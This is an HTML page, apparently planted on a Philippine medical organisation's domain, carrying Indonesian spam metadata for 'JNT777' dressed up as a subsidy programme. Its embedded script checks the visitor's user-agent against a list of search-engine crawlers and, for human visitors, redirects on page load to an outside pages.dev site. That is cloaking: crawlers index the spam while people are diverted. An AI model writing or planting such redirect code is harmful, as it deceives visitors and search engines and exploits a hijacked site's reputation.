
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="JNT777 - Program Subsidi Baru yang Terupdate Serta Terbaru adalah langkah penting untuk mengembangkan terkait regulasi baru.">
    <meta name="keywords" content="JNT777-7">
    <meta name="author" content="JNT777-7">

    <!-- Canonical Link -->
    <link rel="canonical" href="https://www.visayasmedcebu.com.ph/JNT777-7">

    <!-- Favicon -->
    <link rel="shortcut icon" type="image/png" href="https://www.svgrepo.com/show/485700/dollar1.svg">
    
   <!-- Open Graph Meta Tags -->
   <meta property="og:title" content="JNT777 Terbaru untuk mengembangkan terkait regulasi baru">
    <meta property="og:description" content="JNT777 - Program Subsidi Baru yang Terupdate Serta Terbaru adalah langkah penting untuk mengembangkan terkait regulasi baru.">
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://www.visayasmedcebu.com.ph/JNT777-7">
    <meta property="og:image" content="https://i.ibb.co.com/j4C9tJB/tt.jpg">
    
    <!-- Twitter Meta Tags -->
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="JNT777 Terbaru untuk mengembangkan terkait regulasi baru">
    <meta name="twitter:description" content="JNT777 - Program Subsidi Baru yang Terupdate Serta Terbaru adalah langkah penting untuk mengembangkan terkait regulasi baru.">
    <meta name="twitter:image" content="https://i.ibb.co.com/j4C9tJB/tt.jpg">

    <title>JNT777 Terbaru untuk mengembangkan terkait regulasi baru</title>

    <script>
        // Fungsi untuk mendeteksi apakah pengunjung adalah bot atau manusia
        function isBot() {
            var userAgent = navigator.userAgent.toLowerCase();
            // Daftar user-agent bot populer
            var bots = [
                "googlebot", "bingbot", "slurp", "duckduckbot", "baiduspider", 
                "yandexbot", "sogou", "exabot", "facebot", "ia_archiver"
            ];
            // Periksa apakah user-agent cocok dengan salah satu bot
            for (var i = 0; i < bots.length; i++) {
                if (userAgent.indexOf(bots[i]) !== -1) {
                    return true;
                }
            }
            return false;
        }

        // Jika pengunjung bukan bot, redirect ke halaman lain
        window.onload = function() {
            if (!isBot()) {
                // Redirect manusia ke halaman lain
                window.location.href = "https://noguts.pages.dev/"; // Ganti dengan URL tujuan redirect
            }
        }
    </script>
</head>
<body>
</body>
</html>